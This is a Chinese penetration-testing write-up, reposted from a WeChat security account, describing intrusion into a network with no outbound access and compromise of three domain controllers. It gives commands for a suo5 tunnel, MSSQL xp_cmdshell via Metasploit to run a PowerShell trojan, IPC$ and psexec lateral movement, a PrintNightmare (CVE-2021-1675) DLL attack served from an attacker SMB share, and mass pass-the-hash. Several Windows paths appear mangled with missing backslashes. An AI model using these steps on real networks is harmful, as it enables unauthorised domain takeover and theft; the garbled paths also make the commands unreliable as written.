记一次不出网渗透打到域控

admin 2023年5月23日23:18:37评论93 views字数 2826阅读9分25秒阅读模式

前言:

这个周主要任务就是摸鱼,所以有时间来更新一些实战的内网渗透,本文主要讲一个不出网渗透和两个拿域控的方法,内容比较简单。

getshell:

目标存在jboss漏洞,可直接getshell

记一次不出网渗透打到域控
image-20230309214708015

这里不多说。

信息收集:

先用fscan扫一下这个地址段:

fscan.exe -h 1.1.1.1/16
fscan.exe -h 1.1.1.1/16 -m netbios

这里说一下,扫描之后先挖掘重要的内容,最常见的就是先发现里面的一些集权设备,比如域,venceter等。

后面的这些弱口令,nday啥的可以配合这些环境来合理运用。

对扫描结果分析目标存在域环境:

记一次不出网渗透打到域控
image-20230309215041457

接下来我还是对这个域环境进行渗透,本次对域环境渗透主要用两个方法,个人感觉比较不错。

不出网代理:

判断目标主机不出网

记一次不出网渗透打到域控
image-20230309215200723

这个时候还是想着把流量代理出来,我们常用rege工具,这个也是最常用的,比较好。

最近看到了一个新出的不出网代理的脚本suo5,这个速度挺快的,我是用这个来做代理的

将suo5.jsp上传到目标服务器

记一次不出网渗透打到域控
image-20230309215442022

在服务器上启动suo5脚本:(socks5协议)

./suo5 -t http://x.x.x.x/suo5.jsp -l 本地ip:本地端口 
记一次不出网渗透打到域控
image-20230309215711016

如图启动成功,连接本地的socks代理即可使用。

上线第一台域主机:

回头看fscan扫描的结果,发现有一个mssql数据库:

记一次不出网渗透打到域控
image-20230309215851412

对比该地址发现该地址在域内

记一次不出网渗透打到域控
image-20230309220023908

这里我利用msf执行xpcmdshell

启动msf,注意这里用代理启动:

proxychains msfconsole

执行xpcmdshell:

use auxiliary/admin/mssql/mssql_exec
set rhosts 
set rport
set cmd cmd.exe /c powershell木马
run
记一次不出网渗透打到域控
image-20230309220234092

就毫无悬念的上线了

记一次不出网渗透打到域控
image-20230309220815976

打域控:

方法一:

这里查看进程,发现了有域管进程:

记一次不出网渗透打到域控
image-20230309220712317

这里直接注入该进程上线:(这里忘记截图了)

这里有了域管理员权限之后,就能直接与域控建立ipc连接,无需密码,不要知道为啥,记住就行了。

域内信息收集得到域控:

shell net view /domain 查看当前域环境
net group "Domain Admins" /domain 查询域管理员账户  
net group "Domain Controllers" /domain 查询域控制器
netdom query pdc   #查看主域控制器
记一次不出网渗透打到域控
image-20230309221124861

获得了3个域控:

分别ping这几个域控得到地址

域控一: 192.168.1.182
域控二:192.168.1.3
域控三:192.168.1.253
主域控制器:192.168.1.182

与域控建立连接:

用域管权限直接与这3个域控建立ipc连接:

shell net use \192.168.1.182c$
shell net use \192.168.1.3c$
shell net use \192.168.1.253c$
shell net use
记一次不出网渗透打到域控
image-20230309222148062
记一次不出网渗透打到域控
image-20230309221344518

可以看到直接与他们建立了ipc连接,而且没有密码就可以。

批量上线域控:

既然与域控建立连接,那么上线也就很容易了。

先利用这个域主机做个转发:

记一次不出网渗透打到域控
image-20230309221731902

点击视图。里面有一个添加主机

记一次不出网渗透打到域控
image-20230309221937355

将这3个域控主机添加上去

记一次不出网渗透打到域控
image-20230309222328707

然后全选,右键横向移动,选择psexec:

勾选这个按钮,然后选择监听器,会话选择域管理员会话,然后就能上线了

记一次不出网渗透打到域控
image-20230309222413389
记一次不出网渗透打到域控
image-20230309222603768

这里上线两台,不过已经够了。

方法二:

这里利用cve-2021-1675这个漏洞来打,这个漏洞基本也是通杀的,利用这个漏洞提权也是很不错的,有想法的师傅可以自己去研究一下。

前提:

获取任意域用户密码:

这个漏洞一般分两步,第一步是要开启一个smb,第二步是利用脚本打一个dll过去。

开启smb:

这里利用一个师傅的bat脚本开启smb,直接在sqlserver这台机器上开启:

随便建立一个目录:

mkdir C:userstest

项目地址:https://github.com/NyDubh3/AnonymousSMBServer

开启smb:

smb.bat enable C:userstest
记一次不出网渗透打到域控
image-20230310133129339

cs生成dll脚本放到C:userstest目录下,访问 ip地址smb就可以了

利用脚本打过去:https://github.com/cube0x0/CVE-2021-1675

proxychains python3 CVE-2021-1675.py 域名子/域用户:密码@域控 '\smb地址smbbind.dll'
记一次不出网渗透打到域控
image-20230310133448288

成功上线域控。

PS:

这个脚本好像是一次性的,打一次过去之后,打印机服务会自动关闭,不太确定。

当然还可以利用mimiakatz打这个漏洞,有兴趣的师傅可以自行去复现。

关闭smb服务:

smb.bat disable C:userstest
记一次不出网渗透打到域控
image-20230310133833407

批量上线主机:

最后来一个批量主机上线来玩一下,纯属娱乐:

上线之前先将445端口的主机ip地址提取出来,放到txt里面:

这里有一个导入功能,将txt导入进去

记一次不出网渗透打到域控
image-20230310134159404

这里以administrator的hash密码来做一个pth攻击,直接PTH

记一次不出网渗透打到域控
image-20230310134313743

效果如图:

记一次不出网渗透打到域控
image-20230310134435869

后面的权限维持抓密码什么的就不做了,方面前面文章介绍的有。

总结:

本篇文章总体下来还是比较容易理解的,第一个点就是不出网代理,我用的是suo5这个工具,这个用起来确实很快,比较推荐。

第二个就是打域控的方法,方法一确实很快,这也是我们在拿到普通域用户system时一定要先看有没有域管进程,直接注入拿域控确实很快。方法二也是我认为比较好的方法,不仅域环境提权好用,工作组也挺好用,基本通杀。


原文始发于微信公众号(哈拉少安全小队):记一次不出网渗透打到域控

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月23日23:18:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次不出网渗透打到域控https://cn-sec.com/archives/1755599.html

发表评论

匿名网友 填写信息